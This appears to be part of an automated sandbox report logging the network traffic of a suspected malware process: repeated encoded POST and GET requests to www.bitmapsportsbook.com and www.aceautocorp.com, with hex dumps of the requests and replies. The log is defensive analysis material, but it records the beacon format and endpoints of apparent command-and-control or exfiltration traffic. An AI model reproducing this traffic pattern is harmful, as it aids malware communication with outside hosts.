                                                          27192.168.2.104973591.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:56.030184984 CEST1783OUTPOST /zwgt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Origin: http://www.bitmapsportsbook.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.bitmapsportsbook.com/zwgt/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 51 41 38 4c 70 66 4a 77 79 35 79 7a 2f 7a 53 39 6c 76 48 54 6c 58 6f 64 38 4f 30 63 6b 6a 50 73 56 67 52 5a 36 70 69 61 30 6f 4f 6f 72 76 38 66 77 41 44 6d 49 2f 70 61 73 72 70 43 64 76 6d 64 72 6a 59 4e 72 46 46 38 30 50 76 43 65 6c 6d 6d 49 78 52 79 4f 49 66 6a 77 50 71 76 42 4d 74 59 56 5a 6d 4c 47 45 6e 59 78 43 55 4d 76 44 54 4e 42 45 6f 38 78 77 5a 38 46 66 74 59 48 67 64 79 46 66 63 38 47 46 66 47 42 37 78 43 51 6d 6d 79 38 33 71 61 73 51 79 4f 52 45 31 4d 7a 31 74 35 33 2b 61 79 58 63 46 75 64 4f 78 31 32 76 33 63 47 6c 6e 32 45 64 37 4f 42 33 5a 45 4e 55 6d 6c 56 4f 56 63 79 6e 2f 59 4b 4d 57 32 73 35 69 72 53 72 6d 48 4a 56 56 6e 44 49 70 59 75 49 77 72 75 55 46 41 78 4d 53 6c 44 43 73 6d 6b 76 69 43 62 78 46 35 2b 66 48 36 71 66 71 43 33 70 50 42 2b 61 61 72 6b 56 69 74 74 72 2f 6a 64 32 58 66 43 68 45 6f 6a 38 53 70 42 65 42 67 4a 45 4e 4c 2b 2b 57 71 71 4e 58 2b 73 35 6f 66 66 71 61 41 68 52 44 6b 74 43 43 41 68 5a 4f 54 51 75 38 69 4f 71 2b 54 42 35 43 35 6f [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=QA8LpfJwy5yz/zS9lvHTlXod8O0ckjPsVgRZ6pia0oOorv8fwADmI/pasrpCdvmdrjYNrFF80PvCelmmIxRyOIfjwPqvBMtYVZmLGEnYxCUMvDTNBEo8xwZ8FftYHgdyFfc8GFfGB7xCQmmy83qasQyORE1Mz1t53+ayXcFudOx12v3cGln2Ed7OB3ZENUmlVOVcyn/YKMW2s5irSrmHJVVnDIpYuIwruUFAxMSlDCsmkviCbxF5+fH6qfqC3pPB+aarkVittr/jd2XfChEoj8SpBeBgJENL++WqqNX+s5offqaAhRDktCCAhZOTQu8iOq+TB5C5oeiFnq/xe1JiGjdcj606d/7SJj0xHvRZjWM44Dvrc8lDreeehTBfu2RuMXohPQLDBkSgenh1L3pIScWVAscUbPgXsmQ7xJJv06jgItekJ4y+p3zeW9oCC9jz8dQ/W3YCHX4OvNOrugimpqFrtdrZgeafd1TDYdgO2AzF6KNa5e67vZcujzzMax9mqbHlCWWzFmRTBEoDMHz2MaPPnBWl1xwLwTHgr4dOlVB6gxtPR4b50YmQWaIRt3Srq9prmlUgQYGnk1hodmu5YrI5rdO7V0gs8JEGyeZCWgtXyg+656qoklOOe0RSOenU4lNbC/nn1FrBSRutuexjSkPuZcc66NotrXi4mwDd3/qcR0vsEL1rWDh7LDYYccjgUoZqxxXhcaqvfF8GDDdkdlBlFKJAju+1xcBhiaZEuH4ecMeYBEnbHCIN4RLxsdjuqBR2tWVV3Oa2M/PAv1NIuEEougilp8247i2Tggs+vp/PVXOPjhp+nSjnpNOjxnUurFUw8Kz+1nzTYkrZCcc7QoShkHo1PldPt4W0g3iLuPcSnWeLw65hg3o7FbKRthplEROMgeu55mjJVwzdqofnWkNUJGtMzMJxTSDgdiUIrlDqbcG3pWTM12u6z/O3hDkgG8/uw+zn3QEFd7U6zBe1rYDzk1cObYwUMqm0LnPnnJp [TRUNCATED]
                                                          Sep 11, 2024 22:04:56.682657003 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.104973691.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:58.560761929 CEST467OUTGET /zwgt/?bFGXGTdX=dCUrqoNNqYa01jj8ucmLyHx7kNIUn0PrfHpa8tjXz+CKp9k6oQP/Fdto1b0bQ/emz29BsG965J3wVz+jeRQuKqDu3O+8XeswSZaKGjOqnVkBxijyaA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:59.223208904 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.1049737198.12.241.35804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:04.720838070 CEST731OUTPOST /9og3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Origin: http://www.aceautocorp.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.aceautocorp.com/9og3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 55 44 4d 4d 6e 34 56 34 4d 6e 41 6d 73 74 79 34 7a 39 73 58 77 35 75 4b 67 6c 33 63 72 2b 73 54 64 44 75 79 4e 77 42 36 38 43 75 39 32 71 54 78 72 44 4e 6d 38 6d 4f 38 71 61 4b 74 4c 78 70 75 50 5a 56 51 38 7a 2f 62 4c 38 38 45 2f 73 6c 30 36 2f 58 39 73 32 68 51 4a 77 31 72 68 71 44 71 4f 79 44 42 78 76 42 79 32 70 31 79 59 4c 39 57 73 50 48 4a 61 6d 62 71 45 62 6c 55 74 45 66 33 52 78 7a 38 4e 77 68 4c 6d 45 2b 34 39 65 74 74 68 4d 41 35 42 4f 71 48 74 6c 70 77 2b 61 33 71 77 33 4d 31 53 73 47 32 7a 77 74 75 76 4e 49 55 5a 6b 35 69 4f 44 43 41 37 78 61 64
                                                          Data Ascii: bFGXGTdX=UDMMn4V4MnAmsty4z9sXw5uKgl3cr+sTdDuyNwB68Cu92qTxrDNm8mO8qaKtLxpuPZVQ8z/bL88E/sl06/X9s2hQJw1rhqDqOyDBxvBy2p1yYL9WsPHJambqEblUtEf3Rxz8NwhLmE+49etthMA5BOqHtlpw+a3qw3M1SsG2zwtuvNIUZk5iODCA7xad
                                                          Sep 11, 2024 22:05:05.473997116 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:05 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 [TRUNCATED]
                                                          Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=[WY`$qk=&.QPmt ""j5\G-1Ya2T3N,#J},XOPifm\&0<(G ^bB@wCl)u5?qA^1DXe<g/o";Go u]`U_a~uQaX!hr)dj\Z<Ea#DA8Af)p<[?(sPHGtiyNiL5e4zZguuAk@wuw}Fwz9Fa34{ay$#LIOiE'eT\-WXC-0D_p^^j<LPzS6>g+.e*(?Si3<xcNQW6E{=Bgc=yE'j|06r8IGsr'z+.>aVdG5Tt|qy?I/t%C^9HOs>15G*z45BJO6cuS{:HeZ-_/t|
                                                          Sep 11, 2024 22:05:05.474024057 CEST1236INData Raw: ae 8b df be 8d d9 da 26 cd fe fe aa e2 ab 26 15 94 9f b2 2c 36 f5 98 04 dd 03 e7 ba 65 b1 e5 a4 4b 85 6b 57 d6 05 a8 4a 06 51 38 d0 a6 c7 76 53 3b d9 88 34 05 ce 68 cb b7 c1 ee 57 6f 87 d1 8c a5 c0 53 fe 35 1d 64 8c 51 5b 07 f3 fd 40 cb 6a b5 c1
                                                          Data Ascii: &&,6eKkWJQ8vS;4hWoS5dQ[@jU]t/c*~hnnC5J"$4~y_|6VO%U-CIa7^,igg2/jxs+l[7(m<|
                                                          Sep 11, 2024 22:05:05.474036932 CEST1236INData Raw: dc 60 08 4e d2 83 f6 74 23 4a 36 24 d3 e4 60 fe 4f 08 88 89 91 16 4d ba 79 e1 64 73 0d 59 b3 b9 8d 4c db a3 25 30 d3 54 c8 0d f3 a1 7d c5 ac de a9 fc 3a 8b d6 f7 80 1c 31 d8 57 0a d6 dc 0a ef ee bd 81 43 8d bf 73 94 56 9e d9 93 79 45 32 a0 47 04
                                                          Data Ascii: `Nt#J6$`OMydsYL%0T}:1WCsVyE2GC6y0-5cA_H#r0>,TDzSPX1)a?Us(hWiQvrub;K3^LC t&rQ)PX$
                                                          Sep 11, 2024 22:05:05.474049091 CEST1236INData Raw: 68 d9 a2 ca ff ad cb 21 73 32 20 4d 6b 47 06 a3 00 1f 45 36 5f 55 4b cc 30 ca 78 49 b4 f1 c4 36 c8 0c 2e 06 4a 8c dc 42 36 9a 18 c7 2e 9f d1 4b 5b 96 16 ca 82 e7 e9 a9 23 93 0d a7 00 9c 45 2c 10 a6 dc 18 10 08 b1 57 d4 f9 da 50 3c d6 50 49 4d 22
                                                          Data Ascii: h!s2 MkGE6_UK0xI6.JB6.K[#E,WP<PIM"xSMxKSzT^;n`{g_.k,M ocu0uEI})>\jL_.QeDvyBbd[ge pQ<F2G-
                                                          Sep 11, 2024 22:05:05.474061966 CEST1236INData Raw: 91 0a 2c 00 f7 47 90 e5 ad cc 28 ce f0 4b 56 b5 f0 33 d0 74 42 09 b5 6f 7f 3c e8 c1 1c 23 1e 54 bb 03 f2 b1 a2 b4 30 1a a7 2e 92 82 6d f0 fa 26 36 5b 11 f4 94 d1 9a 1b bb 84 eb 6c db 36 db c4 04 a6 12 8a bd b8 5a 8c 8a 1f dd d8 25 5c e7 aa e5 5d
                                                          Data Ascii: ,G(KV3tBo<#T0.m&6[l6Z%\]CPA"gRuM2'HUD<3K#TyS}2Fn"j|7B<Q-ooNN7[*NUY:KqV)q0G!O,FeVis1<#Q
                                                          Sep 11, 2024 22:05:05.474073887 CEST1120INData Raw: 94 d3 f6 27 81 fc c9 97 9d 4b e1 a4 54 78 53 f1 5b a0 e2 1e 90 ff 17 21 c3 58 08 90 42 55 8a 06 e7 8a d8 d4 cb 20 e4 0a a5 cc 86 0f 42 c6 9c 83 eb 28 b6 18 d7 b2 7a 70 49 04 94 7d 12 48 50 27 02 60 1f 27 56 a8 c3 1d 11 b5 06 57 71 ae ed 71 a2 cc
                                                          Data Ascii: 'KTxS[!XBU B(zpI}HP'`'VWqqEAFYR]351J#<Wa~F1v8hQoN`,qEtYTP<SPNTnah/+soN"^&}5DVkEv
                                                          Sep 11, 2024 22:05:05.474216938 CEST1236INData Raw: 0b dd 4f 6e c8 6d 75 96 17 42 63 fb ca 09 f9 3c 7c e4 83 9c 56 0f b9 20 27 e7 21 0f e4 e4 ba 4d 5a 0c ce ba 59 33 a1 d1 c4 0e 5d 02 b1 d2 55 a1 bc f0 bd db 7c 9b c1 73 7e d1 f2 26 62 8d 5b 30 53 e8 1c 23 19 8c 9a 67 6c 6d 96 d2 eb 26 8a 36 12 d6
                                                          Data Ascii: OnmuBc<|V '!MZY3]U|s~&b[0S#glm&6zi@c]aomvjGEt~-nOl3Niyp,A4hS=h1p6zAs$l4X, ZA8dp2eY>(8;sb~J$^E
                                                          Sep 11, 2024 22:05:05.474237919 CEST224INData Raw: b4 25 e3 17 04 5a 04 57 9c 70 15 b0 95 9c 53 42 e3 dc 0b c3 c9 e4 85 e7 64 8d f0 94 1c c2 40 2a 13 a5 27 84 1a e5 68 8b c1 2d 91 c6 66 13 77 96 63 b0 39 8a e9 bb e3 85 20 e8 50 da ed 18 a8 22 04 2c e7 96 83 df 13 d3 75 3b 4c 85 c3 db b8 06 bb 4d
                                                          Data Ascii: %ZWpSBd@*'h-fwc9 P",u;LMF#5?\mmd<B\vTxA=(BQ<rED*SFGXN6=%s]V@<n<>t?5]s
                                                          Sep 11, 2024 22:05:05.474250078 CEST1236INData Raw: 34 8d d6 eb d6 15 d1 55 e3 b5 df 32 f2 d7 0c c4 cd 6d af 66 3a 9e fd e2 fa c1 e3 73 d7 ca e1 ce a6 eb c4 0a 41 a7 dc 94 f4 e1 ca 4c 06 05 eb 4f f2 b3 d2 1c 7a 9a 8e d9 63 3d 38 e2 90 47 8d 8f e8 af e4 c5 33 67 ee 25 66 2c b4 81 42 26 fa e0 0e f0
                                                          Data Ascii: 4U2mf:sALOzc=8G3g%f,B&<V:heV[o%Vd1'6OL7tU{!`CupU=Fi}or `~W`L?zY|"9kpb%'}00Mf
                                                          Sep 11, 2024 22:05:05.474271059 CEST488INData Raw: e7 a9 6c db 10 56 14 ab af ee 94 ee 8a 43 4d 92 38 3b e8 71 30 c1 f6 10 52 bd 2e 79 57 9b a3 a7 67 0c 13 9c cf 90 fe a2 69 39 b5 12 8c fd 2b bb 2a 34 b9 82 b9 1e 5b d7 30 88 6e a7 83 ce 01 57 0c d4 83 b5 1e 09 b2 0c 25 f3 13 75 25 74 cf 05 7a 68
                                                          Data Ascii: lVCM8;q0R.yWgi9+*4[0nW%u%tzht'*-t<Mbk5x@g<$"VdSZjS"a$ak3?>4t!C+Se:AhPV't9KlU:w].p


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.1049738198.12.241.35804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:07.264355898 CEST755OUTPOST /9og3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Origin: http://www.aceautocorp.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.aceautocorp.com/9og3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 55 44 4d 4d 6e 34 56 34 4d 6e 41 6d 71 4e 69 34 78 65 30 58 6e 4a 75 4e 73 46 33 63 77 4f 73 58 64 44 69 79 4e 78 46 71 37 77 36 39 32 4c 6a 78 71 43 4e 6d 37 6d 4f 38 2f 71 4c 6c 46 52 70 6e 50 59 70 69 38 32 66 62 4c 34 55 45 2f 6f 74 30 35 49 44 38 74 6d 68 53 51 41 31 74 69 61 44 71 4f 79 44 42 78 76 45 6e 32 70 74 79 59 37 4e 57 72 62 72 49 53 47 62 6c 46 62 6c 55 36 30 66 7a 52 78 7a 56 4e 79 56 68 6d 43 36 34 39 62 52 74 77 34 30 32 62 65 71 64 67 46 70 75 31 59 69 41 32 6c 73 42 62 76 44 37 7a 6d 78 58 6f 73 70 54 49 31 59 31 64 30 65 4f 31 33 76 33 33 68 31 70 4a 6b 38 6d 57 79 50 74 57 77 57 36 37 6f 31 35 31 51 3d 3d
                                                          Data Ascii: bFGXGTdX=UDMMn4V4MnAmqNi4xe0XnJuNsF3cwOsXdDiyNxFq7w692LjxqCNm7mO8/qLlFRpnPYpi82fbL4UE/ot05ID8tmhSQA1tiaDqOyDBxvEn2ptyY7NWrbrISGblFblU60fzRxzVNyVhmC649bRtw402beqdgFpu1YiA2lsBbvD7zmxXospTI1Y1d0eO13v33h1pJk8mWyPtWwW67o151Q==
                                                          Sep 11, 2024 22:05:08.548958063 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:07 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 [TRUNCATED]
                                                          Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=[WY`$qk=&.QPmt ""j5\G-1Ya2T3N,#J},XOPifm\&0<(G ^bB@wCl)u5?qA^1DXe<g/o";Go u]`U_a~uQaX!hr)dj\Z<Ea#DA8Af)p<[?(sPHGtiyNiL5e4zZguuAk@wuw}Fwz9Fa34{ay$#LIOiE'eT\-WXC-0D_p^^j<LPzS6>g+.e*(?Si3<xcNQW6E{=Bgc=yE'j|06r8IGsr'z+.>aVdG5Tt|qy?I/t%C^9HOs>15G*z45BJO6cuS{:HeZ-_/t|
                                                          Sep 11, 2024 22:05:08.548971891 CEST1236INData Raw: ae 8b df be 8d d9 da 26 cd fe fe aa e2 ab 26 15 94 9f b2 2c 36 f5 98 04 dd 03 e7 ba 65 b1 e5 a4 4b 85 6b 57 d6 05 a8 4a 06 51 38 d0 a6 c7 76 53 3b d9 88 34 05 ce 68 cb b7 c1 ee 57 6f 87 d1 8c a5 c0 53 fe 35 1d 64 8c 51 5b 07 f3 fd 40 cb 6a b5 c1
                                                          Data Ascii: &&,6eKkWJQ8vS;4hWoS5dQ[@jU]t/c*~hnnC5J"$4~y_|6VO%U-CIa7^,igg2/jxs+l[7(m<|
                                                          Sep 11, 2024 22:05:08.548978090 CEST448INData Raw: dc 60 08 4e d2 83 f6 74 23 4a 36 24 d3 e4 60 fe 4f 08 88 89 91 16 4d ba 79 e1 64 73 0d 59 b3 b9 8d 4c db a3 25 30 d3 54 c8 0d f3 a1 7d c5 ac de a9 fc 3a 8b d6 f7 80 1c 31 d8 57 0a d6 dc 0a ef ee bd 81 43 8d bf 73 94 56 9e d9 93 79 45 32 a0 47 04
                                                          Data Ascii: `Nt#J6$`OMydsYL%0T}:1WCsVyE2GC6y0-5cA_H#r0>,TDzSPX1)a?Us(hWiQvrub;K3^LC t&rQ)PX$
                                                          Sep 11, 2024 22:05:08.548983097 CEST1236INData Raw: 6b ce 25 cf 69 8b 59 55 40 16 19 e7 51 1f 91 8c 80 ce 59 e4 ab d6 e3 7a a9 e5 71 70 ca 1f d9 8c 27 d4 89 e9 58 57 55 02 88 78 22 f7 52 dc de ea e1 2b 89 ea c3 9d 7b 39 84 5a 78 fc a7 dc 50 5f e8 a8 6a eb 03 c7 2d 78 9e 42 9b 6e 64 df 84 9f 0d 20
                                                          Data Ascii: k%iYU@QYzqp'XWUx"R+{9ZxP_j-xBnd ;e*_ySF1OF~.d10VO6@%-@Sc5<kYWdNGXvbY%&6BKQ'}/>!R'.*A
                                                          Sep 11, 2024 22:05:08.548990011 CEST1236INData Raw: d5 d2 c9 f1 fc cb 6b a5 14 16 48 c4 30 6b 16 f1 ef ce 94 90 6f ff 30 4d 70 1b f6 5d fa a4 5b 32 51 69 eb b2 d7 ab 1c 88 37 ee e8 02 d3 a2 00 57 a3 d5 fc 57 e4 ea 94 47 65 7e 1c 91 16 f2 cf 2d e4 51 d2 aa 1d be 66 ac 65 79 8c af 59 5a 44 2a 42 21
                                                          Data Ascii: kH0ko0Mp][2Qi7WWGe~-QfeyYZD*B!=+?7%D17Zny{+:)_f+[m9}T'M3f&5uCFan)rX&"VOmB^/Xyw"*(i?
                                                          Sep 11, 2024 22:05:08.548995018 CEST448INData Raw: 70 2a fc e9 59 6d 8f ee ab 31 7f 40 84 39 17 59 51 ec 18 d6 f0 42 e8 3e 9d 26 38 cf b7 58 af 06 8f 58 58 1f 94 67 1f c7 fa 6b 10 e5 7b 89 53 67 58 f0 06 dc fc a2 a5 19 e6 f9 c6 29 bf 4a 65 d3 ea 06 56 e1 1c 07 af 67 e2 d4 39 e6 62 53 68 f0 c8 c1
                                                          Data Ascii: p*Ym1@9YQB>&8XXXgk{SgX)JeVg9bShWWM#EM3yEjdx3 !~EE=A?wx0|Rp%8tz>zM]ZWQqqC9<,A$+a9HcXx
                                                          Sep 11, 2024 22:05:08.549005032 CEST1236INData Raw: 67 cb 9e 74 8f 00 15 21 16 dc 9f de 69 fc 47 25 2d 0c 9f ac 80 6e f4 40 4f 60 0c 61 a8 b5 91 de 80 ca 6d c0 a4 88 43 e4 51 5a 2c 86 ea 49 46 31 3c d8 c1 d2 5f ee d7 5d ae 87 d7 c3 d6 f4 66 11 b2 09 11 c9 1a df 07 0e 7a 08 b9 df 39 51 a7 33 c2 7f
                                                          Data Ascii: gt!iG%-n@O`amCQZ,IF1<_]fz9Q3u$Y^m4<0gCe"[BOM`!BrK%tS1qub@f(Y.ar{iGv(iIl#`f#S|cp*Csh2|9LHbP+dT<\T
                                                          Sep 11, 2024 22:05:08.549010992 CEST224INData Raw: e0 88 d4 3b 71 b6 a7 50 bc dd c3 08 cd 35 75 3d 8c dd 00 e3 af c1 e4 90 12 e2 69 ac dc 11 ae ff 23 08 a7 cb 8d 50 18 fe 97 9b f3 e4 8a b9 51 08 c0 2b 73 a3 12 98 83 e6 46 31 3f be ba 5e 88 87 e1 b6 f9 d1 0d cd 83 73 2e ce 60 9c 39 df ea 19 8c 5f
                                                          Data Ascii: ;qP5u=i#PQ+sF1?^s.`9_0\<gr=7?Wt~ATdWW~O".%wb$&HN|!rCr&HN/Oq7rn|H\GGB~
                                                          Sep 11, 2024 22:05:08.549015999 CEST1236INData Raw: 0b dd 4f 6e c8 6d 75 96 17 42 63 fb ca 09 f9 3c 7c e4 83 9c 56 0f b9 20 27 e7 21 0f e4 e4 ba 4d 5a 0c ce ba 59 33 a1 d1 c4 0e 5d 02 b1 d2 55 a1 bc f0 bd db 7c 9b c1 73 7e d1 f2 26 62 8d 5b 30 53 e8 1c 23 19 8c 9a 67 6c 6d 96 d2 eb 26 8a 36 12 d6
                                                          Data Ascii: OnmuBc<|V '!MZY3]U|s~&b[0S#glm&6zi@c]aomvjGEt~-nOl3Niyp,A4hS=h1p6zAs$l4X, ZA8dp2eY>(8;sb~J$^E
                                                          Sep 11, 2024 22:05:08.549027920 CEST224INData Raw: b4 25 e3 17 04 5a 04 57 9c 70 15 b0 95 9c 53 42 e3 dc 0b c3 c9 e4 85 e7 64 8d f0 94 1c c2 40 2a 13 a5 27 84 1a e5 68 8b c1 2d 91 c6 66 13 77 96 63 b0 39 8a e9 bb e3 85 20 e8 50 da ed 18 a8 22 04 2c e7 96 83 df 13 d3 75 3b 4c 85 c3 db b8 06 bb 4d
                                                          Data Ascii: %ZWpSBd@*'h-fwc9 P",u;LMF#5?\mmd<B\vTxA=(BQ<rED*SFGXN6=%s]V@<n<>t?5]s
